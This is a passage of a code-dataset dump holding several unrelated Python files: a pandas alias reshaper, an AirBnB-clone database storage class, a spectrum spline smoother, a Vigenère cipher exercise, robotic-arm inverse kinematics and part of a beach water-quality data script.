time.gmtime())\nprint(\"The script start time is {}\".format(readable_start))\n\nwork_dir = r'C:\\E911\\Layton\\working_data'\nalias = pd.read_csv(os.path.join(work_dir, 'CP_Aliases.csv'))\n\nmax_alias = alias['CommonPlacePointID'].value_counts().max()\n\nworking = alias.copy().sort_values('CommonPlacePointID')\n\nfor i in np.arange(max_alias):\n working[f'Alias_{i+2}'] = None\n\ncp_id = list(set(working['CommonPlacePointID'].to_list()))\n\ncompleted_ids = []\n\nfor idx, row in working.iterrows():\n temp_id = row['CommonPlacePointID']\n if temp_id not in completed_ids:\n temp_df = working[working['CommonPlacePointID'] == temp_id]\n new_aliases = temp_df['CommonPlaceAlias Name'].to_list()\n if len(new_aliases) > 1:\n print(new_aliases)\n # Update row for each alias in a new column\n for i in np.arange(1, len(new_aliases)):\n col_name = f'Alias_{i+1}'\n working.loc[idx, col_name] = new_aliases[i]\n \n del temp_df\n del temp_id\n \n completed_ids.append(temp_id)\n \nwork2 = working.drop_duplicates('CommonPlacePointID') \nwork2.to_csv(os.path.join(work_dir, 'CP_multiple_Aliases.csv'))\n\nprint(\"Script shutting down ...\")\n# Stop timer and print end time in UTC\nreadable_end = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script end time is {}\".format(readable_end))\nprint(\"Time elapsed: {:.2f}s\".format(time.time() - start_time))\n","repo_name":"eneemann/Python-Tools","sub_path":"multiple_rows_to_multiple_columns.py","file_name":"multiple_rows_to_multiple_columns.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"36830744636","text":"#!/usr/bin/python3\n\"\"\"\nDBstorage\n\"\"\"\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom models.base_model import Base\nfrom models.state import State\nfrom models.city import City\n\n\nclass DBstorage:\n \"\"\"defines DBstorage class\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"initialise instance\"\"\"\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n os.getenv('HBNB_MYSQL_USER'), os.getenv('HBNB_MYSQL_PWD'),\n os.getenv('HBNB_MYSQL_HOST'), os.getenv('HBNB_MYSQL_DB')),\n pool_pre_ping=True)\n if os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all()\n\n def all(self, cls=None):\n \"\"\"query on the current database session (self.__session) all\n objects depending of the class name\"\"\"\n all_obj = {}\n if cls is not None:\n for row in self.__session.query(cls):\n key = row.__class__.__name__ + '.' + row.id\n all_obj.update({key: row})\n return all_obj\n else:\n models = {mapper.class_.__name__: mapper.class_\n for mapper in Base.registry.mappers}\n for key in list(models.keys()):\n for row in self.__session.query(models[key]):\n key = row.__class__.__name__ + '.' + row.id\n all_obj.update({key: row})\n return all_obj\n\n def new(self, obj):\n \"\"\"add the object to the current database session (self.__session)\"\"\"\n self.__session.add(obj)\n\n def save(self):\n \"\"\"commit all changes of current database session (self.__session)\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete from the current database session obj if not None\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"creates all tables in database and current database session\"\n from models.state import State\n from models.city import City\n from models.user import User\n from models.place import Place\n from models.review import Review\n from models.amenity import Amenity\n\n Base.metadata.create_all(self.__engine)\n session_factory = sessionmaker(bind=self.__engine,\n expire_on_commit=False)\n Session = scoped_session(session_factory)\n self.__session = Session()\n","repo_name":"abdisag1/AirBnB_clone_v2","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2908096131","text":"from rich.console import Console\n\nfrom states import login\n\nconsole = Console()\n\n# Colors used by the console\nbase_color = \"light_salmon3\"\nsuccess_color = \"spring_green3\"\nfail_color = \"red3\"\n\n\ndef main():\n login.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThowV/instagram-follow-resolver","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43704590470","text":"#!/usr/bin/env python\n\n# This scripts takes 2 arguments, 1) Input power file 2) Output power file.\n# It reads the power spectrum file with given z, k, power, error.\n# It then creates a weighted smooth spline:\n# WITHOUT MASKING ANY POINTS,\n# But weighting each point with 1/error\n# If --interp_log is passed as 3rd argument:\n# It MASKS P, e < 0. \n# Interpolates (ln(1+z), lnk, lnP) with weights e/P\n# Finally, it saves this smooth power in the same order to the output text file.\n\nfrom numpy import genfromtxt, log, exp, savetxt\nfrom scipy.interpolate import SmoothBivariateSpline\nfrom argparse import ArgumentParser\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"InputPS\", help=\"Input power spectrum file.\")\n parser.add_argument(\"OutputPS\", help=\"Output power spectrum file.\")\n parser.add_argument(\"--interp_log\", action=\"store_true\",\n help=\"Interpolate ln(k), ln(P) instead.\")\n args = parser.parse_args()\n \n # Read input power file.\n z, k, p, e = genfromtxt(args.InputPS, delimiter=' ', skip_header=2, unpack=True)\n\n # Create 2D Spline object\n # From scipy manual:\n # Default s=len(weight) which should be a good value \n # if 1/weight[i] is an estimate of the standard deviation of power[i].\n\n if args.interp_log:\n print(\"Smoothing ln(k), ln(P) and removing p,e<=0 points.\")\n mask = (p > 0) & (e > 0)\n\n lnz = log(1+z[mask])\n lnk = log(k[mask])\n lnP = log(p[mask])\n lnE = e[mask]/p[mask]\n\n wsbispline = SmoothBivariateSpline(lnz, lnk, lnP, w=1./lnE, s=len(lnE))\n\n smwe_power = wsbispline(log(1+z), log(k), grid=False)\n smwe_power = exp(smwe_power)\n else:\n print(\"Smoothing k, P without masking any points.\")\n wsbispline = SmoothBivariateSpline(z, k, p, w=1./e, s=len(e))\n\n smwe_power = wsbispline(z, k, grid=False)\n\n savetxt(args.OutputPS, smwe_power, header='', comments='')\n exit(0)\n","repo_name":"p-slash/lyspeq","sub_path":"py/smbivspline.py","file_name":"smbivspline.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16671954495","text":"# boj.kr/17951\n\ndef answer(L, max_v):\n global k\n left, right = 0, max_v\n\n while left <= right:\n mid = (left + right) // 2\n\n count = 0\n now = 0\n for i in range(n):\n now += L[i]\n if now >= mid:\n count += 1\n now = 0\n\n if count >= k:\n left = mid + 1\n else:\n right = mid - 1\n return left - 1\n\nimport sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\nL = list(map(int, input().split()))\nmax_value = 0\nfor i in range(n):\n max_value += L[i]\nprint(answer(L, max_value))\n","repo_name":"kjh03160/Algorithm_Basic","sub_path":"practice/ETC/Exam_17951.py","file_name":"Exam_17951.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30611946072","text":"#The first step is to make sure all encrypted characters are part of the Alphabet\r\ndef _pad_key(plaintext, key):\r\n padded_key = ''\r\n i = 0\r\n for char in plaintext:\r\n if char.isalpha():\r\n padded_key += key[i % len(key)]\r\n i += 1\r\n else:\r\n padded_key += ' '\r\n return padded_key\r\n#The second step is the core step when it comes to deciphering plaintext into ciphertext with both lower and uppercase separate\r\ndef _encrypt_char(plaintext_char, keyword_char):\r\n if plaintext_char.isalpha():\r\n first_alphabet_letter = 'a'\r\n if plaintext_char.isupper():\r\n first_alphabet_letter = 'A'\r\n\r\n old_char_position = ord(plaintext_char) - ord(first_alphabet_letter)\r\n key_char_position = ord(keyword_char.lower()) - ord('a')\r\n new_char_position = (old_char_position + key_char_position) % 26\r\n return chr(new_char_position + ord(first_alphabet_letter))\r\n return plaintext_char\r\n\r\n#This sets ciphertext to the product of the Vigenère Cipher from the message(plaintext) and key(keyword)\r\ndef encrypt(plaintext, key):\r\n ciphertext = ''\r\n padded_key = _pad_key(plaintext, key)\r\n for plaintext_char, key_char in zip(plaintext, padded_key):\r\n ciphertext += _encrypt_char(plaintext_char, key_char)\r\n return ciphertext\r\n\r\n#The final step inputs the variables from the input coming from the user\r\nplaintext = input('Enter a message: ')\r\nkey = input('Enter a key: ')\r\nciphertext = encrypt(plaintext, key)\r\nprint(f'Ciphertext: {ciphertext}')","repo_name":"touthecode/assignment","sub_path":"Assignment 2_2.py","file_name":"Assignment 2_2.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71405767895","text":"\"\"\"\r\n\tcode by purushotam kumar agrawal {git --> PURU2411 }\r\n\tInverse kinematics of 6 dof KUKA arm\r\n\"\"\"\r\n\r\nfrom sympy import symbols, cos, sin, pi, simplify, pprint, tan, expand_trig, sqrt, trigsimp, atan2\r\nfrom sympy.matrices import Matrix\r\n\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport numpy as np\r\n\r\n# declaring the link length of the arm\r\na1 = 1.0\r\na2 = 1.0\r\na3 = 5.0\r\na4 = 5.0\r\na5 = 0.2\r\n\r\ndt = 0.001 # choosing dt = 1 ms\r\n\r\n################################################################################################################\r\n################################################################################################################\r\n# forward kinematics is to verify the output and plot the graph\r\n\r\ndef forward_kin(q1, q2, q3, q4, q5, q6):\r\n X = []\r\n Y = []\r\n Z = []\r\n\r\n # DH parameter table of the given robotic arm see figure\r\n DH = np.array([[q1, np.pi / 2, a2, a1],\r\n [q2, 0, a3, 0],\r\n [q3 + np.pi / 2, np.pi / 2, 0, 0],\r\n [q4, -np.pi / 2, 0, a4],\r\n [q5, np.pi / 2, 0, 0],\r\n [q6, 0, 0, a5]])\r\n\r\n # homogeneous matrices\r\n H0_0 = Matrix([[1, 0, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 0, 1, 0],\r\n [0, 0, 0, 1]])\r\n\r\n H0_1 = Matrix([[np.cos(DH[0, 0]), -np.sin(DH[0, 0]) * np.cos(DH[0, 1]), np.sin(DH[0, 0]) * np.sin(DH[0, 1]), DH[0, 2] * np.cos(DH[0, 0])],\r\n [np.sin(DH[0, 0]), np.cos(DH[0, 0]) * np.cos(DH[0, 1]), -np.cos(DH[0, 0]) * np.sin(DH[0, 1]), DH[0, 2] * np.sin(DH[0, 0])],\r\n [0, np.sin(DH[0, 1]), np.cos(DH[0, 1]), DH[0, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H1_2 = Matrix([[np.cos(DH[1, 0]), -np.sin(DH[1, 0]) * np.cos(DH[1, 1]), np.sin(DH[1, 0]) * np.sin(DH[1, 1]), DH[1, 2] * np.cos(DH[1, 0])],\r\n [np.sin(DH[1, 0]), np.cos(DH[1, 0]) * np.cos(DH[1, 1]), -np.cos(DH[1, 0]) * np.sin(DH[1, 1]), DH[1, 2] * np.sin(DH[1, 0])],\r\n [0, np.sin(DH[1, 1]), np.cos(DH[1, 1]), DH[1, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_2 = np.dot(H0_1, H1_2)\r\n\r\n H2_3 = Matrix([[np.cos(DH[2, 0]), -np.sin(DH[2, 0]) * np.cos(DH[2, 1]), np.sin(DH[2, 0]) * np.sin(DH[2, 1]), DH[2, 2] * np.cos(DH[2, 0])],\r\n [np.sin(DH[2, 0]), np.cos(DH[2, 0]) * np.cos(DH[2, 1]), -np.cos(DH[2, 0]) * np.sin(DH[2, 1]), DH[2, 2] * np.sin(DH[2, 0])],\r\n [0, np.sin(DH[2, 1]), np.cos(DH[2, 1]), DH[2, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_3 = np.dot(H0_2, H2_3)\r\n\r\n H3_4 = Matrix([[np.cos(DH[3, 0]), -np.sin(DH[3, 0]) * np.cos(DH[3, 1]), np.sin(DH[3, 0]) * np.sin(DH[3, 1]), DH[3, 2] * np.cos(DH[3, 0])],\r\n [np.sin(DH[3, 0]), np.cos(DH[3, 0]) * np.cos(DH[3, 1]), -np.cos(DH[3, 0]) * np.sin(DH[3, 1]), DH[3, 2] * np.sin(DH[3, 0])],\r\n [0, np.sin(DH[3, 1]), np.cos(DH[3, 1]), DH[3, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_4 = np.dot(H0_3, H3_4)\r\n\r\n H4_5 = Matrix([[np.cos(DH[4, 0]), -np.sin(DH[4, 0]) * np.cos(DH[4, 1]), np.sin(DH[4, 0]) * np.sin(DH[4, 1]), DH[4, 2] * np.cos(DH[4, 0])],\r\n [np.sin(DH[4, 0]), np.cos(DH[4, 0]) * np.cos(DH[4, 1]), -np.cos(DH[4, 0]) * np.sin(DH[4, 1]), DH[4, 2] * np.sin(DH[4, 0])],\r\n [0, np.sin(DH[4, 1]), np.cos(DH[4, 1]), DH[4, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_5 = np.dot(H0_4, H4_5)\r\n\r\n H5_6 = Matrix([[np.cos(DH[5, 0]), -np.sin(DH[5, 0]) * np.cos(DH[5, 1]), np.sin(DH[5, 0]) * np.sin(DH[5, 1]), DH[5, 2] * np.cos(DH[5, 0])],\r\n [np.sin(DH[5, 0]), np.cos(DH[5, 0]) * np.cos(DH[5, 1]), -np.cos(DH[5, 0]) * np.sin(DH[5, 1]), DH[5, 2] * np.sin(DH[5, 0])],\r\n [0, np.sin(DH[5, 1]), np.cos(DH[5, 1]), DH[5, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_6 = np.dot(H0_5, H5_6)\r\n\r\n # print(\"R0_6 comes out to be: \")\r\n # print(np.matrix(H0_6[:3, :3]))\r\n\r\n X.append(0)\r\n X.append(0)\r\n X.append(H0_1[0, 3])\r\n X.append(H0_2[0, 3])\r\n X.append(H0_3[0, 3])\r\n X.append(H0_4[0, 3])\r\n X.append(H0_5[0, 3])\r\n X.append(H0_6[0, 3])\r\n\r\n Y.append(0)\r\n Y.append(0)\r\n Y.append(H0_1[1, 3])\r\n Y.append(H0_2[1, 3])\r\n Y.append(H0_3[1, 3])\r\n Y.append(H0_4[1, 3])\r\n Y.append(H0_5[1, 3])\r\n Y.append(H0_6[1, 3])\r\n\r\n Z.append(0)\r\n Z.append(a1)\r\n Z.append(H0_1[2, 3])\r\n Z.append(H0_2[2, 3])\r\n Z.append(H0_3[2, 3])\r\n Z.append(H0_4[2, 3])\r\n Z.append(H0_5[2, 3])\r\n Z.append(H0_6[2, 3])\r\n\r\n # center of all the frames in ground frame\r\n X = np.reshape(X, (1, 8))\r\n Y = np.reshape(Y, (1, 8))\r\n Z = np.reshape(Z, (1, 8))\r\n\r\n return X, Y, Z\r\n\r\n\r\n\r\ndef create_plot():\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.set_xlabel('x axis')\r\n ax.set_ylabel('y axis')\r\n ax.set_zlabel('z axis')\r\n ax.set_autoscale_on(False)\r\n # fig.canvas.draw()\r\n # plt.show()\r\n return fig, ax\r\n\r\n\r\ndef update_plot(X, Y, Z, X1, Y1, Z1, fig, ax):\r\n X = np.reshape(X, (1, 8))\r\n Y = np.reshape(Y, (1, 8))\r\n Z = np.reshape(Z, (1, 8))\r\n ax.cla()\r\n ax.plot_wireframe(X, Y, Z)\r\n ax.plot_wireframe(X1, Y1, Z1, color = 'r')\r\n # print('in update ', X1, Y1, Z1)\r\n plt.draw()\r\n ax.set_xlabel('x axis')\r\n ax.set_ylabel('y axis')\r\n ax.set_zlabel('z axis')\r\n ax.set_autoscale_on(False)\r\n fig.canvas.draw()\r\n fig.canvas.flush_events()\r\n plt.pause(.001)\r\n # ax.cla()\r\n # ax.plot_wireframe(Z,Y,X,color='r')\r\n # plt.pause(.5)\r\n # ax.plot_wireframe(Z,Y,X,color='b')\r\n # plt.pause(3)\r\n # plt.show()\r\n\r\n################################################################################################################\r\n################################################################################################################\r\n\r\n\r\n# this function is used only to calculate some of the matrices used in it's original trigonometric form like R0_3 and R3_6\r\ndef printMatrices():\r\n a, b, c = symbols('alpha beta gama', real=True)\r\n # rotation matrix after rotating around y-axis (pitch)\r\n A = Matrix([[cos(a), 0, sin(a)], [0, 1, 0], [-sin(a), 0, cos(a)]])\r\n\r\n # rotation matrix after rotating around z-axis (roll)\r\n B = Matrix([[cos(b), -sin(b), 0], [sin(b), cos(b), 0], [0, 0, 1]])\r\n\r\n # rotation matrix after rotating around x-axis (yaw)\r\n C = Matrix([[1, 0, 0], [0, cos(c), -sin(c)], [0, sin(c), cos(c)]])\r\n\r\n # after total rotation of pitch, roll and yaw\r\n D = A * B * C\r\n print(D)\r\n\r\n q1, q2, q3, q4, q5, q6 = symbols('q1:7')\r\n a1, a2, a3, a4, a5, a6, a7 = symbols('a1:8')\r\n\r\n # DH parameter of the given arm\r\n DH = Matrix([[q1, pi/2, a2, a1],\r\n [q2, 0, a3, 0 ],\r\n [q3+pi/2, pi/2, 0, 0],\r\n [q4, -pi/2, 0, a4],\r\n [q5, pi/2, 0, 0],\r\n [q6, 0, 0, a5]])\r\n\r\n # homogeneous matrices\r\n H0_1 = Matrix([[cos(DH[0,0]), -sin(DH[0,0])*cos(DH[0,1]), sin(DH[0,0])*sin(DH[0,1]), DH[0,2]*cos(DH[0,0])],\r\n [sin(DH[0,0]), cos(DH[0,0])*cos(DH[0,1]), -cos(DH[0,0])*sin(DH[0,1]), DH[0,2]*sin(DH[0,0])],\r\n [0, sin(DH[0,1]), cos(DH[0,1]), DH[0,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H1_2 = Matrix([[cos(DH[1,0]), -sin(DH[1,0])*cos(DH[1,1]), sin(DH[1,0])*sin(DH[1,1]), DH[1,2]*cos(DH[1,0])],\r\n [sin(DH[1,0]), cos(DH[1,0])*cos(DH[1,1]), -cos(DH[1,0])*sin(DH[1,1]), DH[1,2]*sin(DH[1,0])],\r\n [0, sin(DH[1,1]), cos(DH[1,1]), DH[1,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H2_3 = Matrix([[cos(DH[2,0]), -sin(DH[2,0])*cos(DH[2,1]), sin(DH[2,0])*sin(DH[2,1]), DH[2,2]*cos(DH[2,0])],\r\n [sin(DH[2,0]), cos(DH[2,0])*cos(DH[2,1]), -cos(DH[2,0])*sin(DH[2,1]), DH[2,2]*sin(DH[2,0])],\r\n [0, sin(DH[2,1]), cos(DH[2,1]), DH[2,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H3_4 = Matrix([[cos(DH[3,0]), -sin(DH[3,0])*cos(DH[3,1]), sin(DH[3,0])*sin(DH[3,1]), DH[3,2]*cos(DH[3,0])],\r\n [sin(DH[3,0]), cos(DH[3,0])*cos(DH[3,1]), -cos(DH[3,0])*sin(DH[3,1]), DH[3,2]*sin(DH[3,0])],\r\n [0, sin(DH[3,1]), cos(DH[3,1]), DH[3,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H4_5 = Matrix([[cos(DH[4,0]), -sin(DH[4,0])*cos(DH[4,1]), sin(DH[4,0])*sin(DH[4,1]), DH[4,2]*cos(DH[4,0])],\r\n [sin(DH[4,0]), cos(DH[4,0])*cos(DH[4,1]), -cos(DH[4,0])*sin(DH[4,1]), DH[4,2]*sin(DH[4,0])],\r\n [0, sin(DH[4,1]), cos(DH[4,1]), DH[4,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H5_6 = Matrix([[cos(DH[5,0]), -sin(DH[5,0])*cos(DH[5,1]), sin(DH[5,0])*sin(DH[5,1]), DH[5,2]*cos(DH[5,0])],\r\n [sin(DH[5,0]), cos(DH[5,0])*cos(DH[5,1]), -cos(DH[5,0])*sin(DH[5,1]), DH[5,2]*sin(DH[5,0])],\r\n [0, sin(DH[5,1]), cos(DH[5,1]), DH[5,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H0_6 = H0_1*H1_2*H2_3*H3_4*H4_5*H5_6\r\n print(H0_6)\r\n\r\n print(H0_1)\r\n print(H1_2)\r\n print(H2_3)\r\n print(H3_4)\r\n print(H4_5)\r\n print(H5_6)\r\n\r\n # rotation matrices\r\n R0_1 = H0_1[:3, :3]\r\n R0_2 = R0_1*H1_2[:3, :3]\r\n R0_3 = R0_2*H2_3[:3, :3]\r\n R0_4 = R0_3*H3_4[:3, :3]\r\n R0_5 = R0_4*H4_5[:3, :3]\r\n R0_6 = R0_5*H5_6[:3, :3]\r\n print(R0_1)\r\n print(R0_2)\r\n print(R0_3)\r\n print(R0_4)\r\n print(R0_5)\r\n print(R0_6)\r\n\r\n R36 = H3_4[:3, :3]*H4_5[:3, :3]*H5_6[:3, :3]\r\n print(R36)\r\n\r\n\r\ndef get_cosine_law_angle(a, b, c):\r\n # given all sides of a triangle a, b, c\r\n # calculate angle gamma between sides a and b using cosine law\r\n\r\n gamma = np.arccos((a*a + b*b - c*c) / (2*a*b))\r\n\r\n return gamma\r\n\r\n\r\ndef griperCenter(px, py, pz, R06):\r\n # calculating griper center, see in arm diagram for detail\r\n Xc = px - a5*R06[0,2]\r\n Yc = py - a5*R06[1,2]\r\n Zc = pz - a5*R06[2,2]\r\n return Xc, Yc, Zc\r\n\r\n\r\ndef calcFirst3Angles(Xc, Yc, Zc):\r\n # doing inverse kinematics on first 3 dof the reach the center of griper\r\n # see the calculation page of inverse kinematics for more details\r\n\r\n q1 = np.arctan2(Yc, Xc)\r\n\r\n r1 = np.sqrt(Xc**2 + Yc**2)\r\n r2 = np.sqrt((r1-a2)**2 + (Zc-a1)**2)\r\n\r\n phi1 = np.arctan((Zc-a1)/(r1-a2))\r\n phi2 = get_cosine_law_angle(a3, r2, a4)\r\n q2 = phi1 + phi2\r\n\r\n phi3 = get_cosine_law_angle(a3, a4, r2)\r\n q3 = phi3 - np.pi\r\n\r\n return q1, q2, q3\r\n\r\n\r\ndef calcLast3Angles(R36):\r\n # evaluating last 3 angles by comparing the matrices\r\n # R36 = Matrix([[-sin(q4)*sin(q6) + cos(q4)*cos(q5)*cos(q6), -sin(q4)*cos(q6) - sin(q6)*cos(q4)*cos(q5), sin(q5)*cos(q4)],\r\n # [sin(q4)*cos(q5)*cos(q6) + sin(q6)*cos(q4), -sin(q4)*sin(q6)*cos(q5) + cos(q4)*cos(q6), sin(q4)*sin(q5)],\r\n # [-sin(q5)*cos(q6) , sin(q5)*sin(q6) , cos(q5)]])\r\n\r\n q4 = np.arctan2(R36[1,2],R36[0, 2])\r\n\r\n q5 = np.arccos(R36[2,2])\r\n\r\n q6 = np.arctan2(R36[2,1],-R36[2,0])\r\n return q4, q5, q6\r\n\r\n\r\ndef get_angles(px, py, pz, beta, alpha, gama):\r\n\r\n # the frame of griper is pre-rotated from bellow rotation matrix\r\n R6a = [[0, 0, 1.0], [0, -1.0, 0], [1.0, 0, 0]]\r\n\r\n # after rotation of pitch, roll, yaw\r\n R6b = [[np.cos(alpha)*np.cos(beta), np.sin(alpha)*np.sin(gama) - np.sin(beta)*np.cos(alpha)*np.cos(gama), np.sin(alpha)*np.cos(gama) + np.sin(beta)*np.sin(gama)*np.cos(alpha)],\r\n [np.sin(beta) , np.cos(beta)*np.cos(gama) , -np.sin(gama)*np.cos(beta)],\r\n [-np.sin(alpha)*np.cos(beta), np.sin(alpha)*np.sin(beta)*np.cos(gama) + np.sin(gama)*np.cos(alpha), -np.sin(alpha)*np.sin(beta)*np.sin(gama) + np.cos(alpha)*np.cos(gama)]]\r\n # total rotation of griper frame WRT ground frame\r\n R06 = np.dot(R6a,R6b)\r\n # print(np.matrix(R06))\r\n\r\n # calculating center of griper\r\n Xc, Yc, Zc = griperCenter(px, py, pz, R06)\r\n\r\n # calculating first 3 angles\r\n q1, q2, q3 = calcFirst3Angles(Xc, Yc, Zc)\r\n\r\n # rotation matrix of 3 wrt 0 frame see the calculation sheet for more understanding\r\n R03 = [[-np.sin(q2) * np.cos(q1) * np.cos(q3) - np.sin(q3) * np.cos(q1) * np.cos(q2), np.sin(q1), -np.sin(q2) * np.sin(q3) * np.cos(q1) + np.cos(q1) * np.cos(q2) * np.cos(q3)],\r\n [-np.sin(q1) * np.sin(q2) * np.cos(q3) - np.sin(q1) * np.sin(q3) * np.cos(q2), -np.cos(q1), -np.sin(q1) * np.sin(q2) * np.sin(q3) + np.sin(q1) * np.cos(q2) * np.cos(q3)],\r\n [-np.sin(q2) * np.sin(q3) + np.cos(q2) * np.cos(q3), 0, np.sin(q2) * np.cos(q3) + np.sin(q3) * np.cos(q2)]]\r\n\r\n IR03 = np.transpose(R03)\r\n\r\n R36 = np.dot(IR03, R06)\r\n\r\n q4, q5, q6 = calcLast3Angles(R36)\r\n\r\n return q1, q2, q3, q4, q5, q6\r\n\r\n\r\ndef main():\r\n\r\n # printMatrices()\r\n\r\n # position of end effector\r\n px, py, pz = 5.0, 1.0, 1.0\r\n # value of orientation of the end effector\r\n roll, pitch, yaw = 0, 0, 0\r\n\r\n q1, q2, q3, q4, q5, q6 = get_angles(px, py, pz, roll, pitch, yaw)\r\n\r\n print(\"q1 : \", q1)\r\n print(\"q2 : \", q2)\r\n print(\"q3 : \", q3)\r\n print(\"q4 : \", q4)\r\n print(\"q5 : \", q5)\r\n print(\"q6 : \", q6)\r\n\r\n # to check the output\r\n X, Y, Z = forward_kin(q1, q2, q3, q4, q5, q6)\r\n print(\"X : \", X[0, 7])\r\n print(\"Y : \", Y[0, 7])\r\n print(\"Z : \", Z[0, 7])\r\n\r\n fig, ax = create_plot()\r\n update_plot(X, Y, Z, X, Y, Z, fig, ax)\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"puru2411/Robotic-arm-3-and-6-dof","sub_path":"6dof/invkin_puru.py","file_name":"invkin_puru.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8805399197","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nvars_combo.py\nCreated on Wed Jan 8 19:37:57 2020\n\n@author: rtsearcy\n\nUpdate 2022\n\nCombine FIB and EV datasets into a single dataframe for a given beach\n- Calculate beach-specific variables\n\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nfrom numpy import sin, cos, pi, isnan, nan, log10\n\n#%% Inputs + Load Data\nfolder = '/Volumes/GoogleDrive/My Drive/water_quality_modeling/forecasting'\nbeach = 'HSB3N'\n\nsd = '2000-01-01' # dates of dataset\ned = '2021-12-31'\n\nFIB = {'EC':400, \n 'ENT': 104}\n\n### Lag vars list\nlag_range = range(1,6)\nlag_vars = [\n 'tide_max','tide_min','tide_range',\n 'logflow', 'upwell','upwell_bin',\n 'WVHT','APD','DPD','wtemp_b','WVHT_q75','DPD_q75',\n 'logchl','logturb','cond','DO','wtemp','chl_q75','turb_q75',\n 'along','cross','cross_bin','along_bin','current_mag','along_mag','cross_mag',\n 'atemp','atemp_min','dtemp','rad','relhum',\n 'wspd','gust','awind','owind','wspd_q75', 'owind_bin', 'awind_bin'\n ]\n \n\n### FIB Data\nfib_file = os.path.join(folder, \n 'beach', \n beach.replace(' ','_'), \n 'variables', \n 'FIB_variables_' + beach.replace(' ','_') + '.csv')\nfib = pd.read_csv(fib_file, index_col=['date'], parse_dates=['date'])\nfib.drop(['sample_time'], axis=1, inplace=True)\n\nfib['year'] = fib.index.year\nfib['month'] = fib.index.month\nfib['doy'] = fib.index.dayofyear # Day of Year\nfib['dow'] = fib.index.dayofweek # Monday=0, Sunday=6\nfib['weekend'] = (fib.dow.isin([6,5,4])).astype(int)\nfib['weekend1'] = (fib.dow.isin([0,6,5])).astype(int)\n\nprint(beach)\nprint('\\nFIB (N=' + str(len(fib)) + ', ' + str(fib.index.year.min()) + '-' + str(fib.index.year.max()) + ')\\nMissing:')\nprint(fib.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n### Load Enviro. Variables\nstations = pd.read_csv(os.path.join(folder,'beach','beach_env_stations.csv'), index_col='beach')\nstations = stations.loc[beach]\nangle = stations['angle'] # Cowell - 135, MB - \n\n## Flow\ntry:\n s = [s for s in os.listdir(os.path.join(folder,'data/flow/')) if stations.flow.replace(' ','_') in s][0]\n flow = pd.read_csv(os.path.join(folder,'data/flow/',s), parse_dates=['date'], index_col=['date'])\n\n print('\\nFlow (N=' + str(len(flow)) + ', ' + str(flow.index.year.min()) + '-' + str(flow.index.year.max()) + ')\\nMissing:')\n print(flow.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\nexcept:\n flow = pd.DataFrame()\n\n## Tide\ns = [s for s in os.listdir(os.path.join(folder,'data/tide/')) if stations.tide.replace(' ','_') in s][0]\ntide = pd.read_csv(os.path.join(folder,'data/tide/',s), parse_dates=['date'], index_col=['date'])\n\nprint('\\nTide (N=' + str(len(tide)) + ', ' + str(tide.index.year.min()) + '-' + str(tide.index.year.max()) + ')\\nMissing:')\nprint(tide.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Upwelling\ns = [s for s in os.listdir(os.path.join(folder,'data/upwelling/')) if stations.upwell.replace(' ','_') in s][0]\nupwell = pd.read_csv(os.path.join(folder,'data/upwelling/',s), parse_dates=['date'], index_col=['date'])\n\nprint('\\nUpwelling (N=' + str(len(upwell)) + ', ' + str(upwell.index.year.min()) + '-' + str(upwell.index.year.max()) + ')\\nMissing:')\nprint(upwell.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Waves\ns = [s for s in os.listdir(os.path.join(folder,'data/waves/')) if stations.waves.replace(' ','_') in 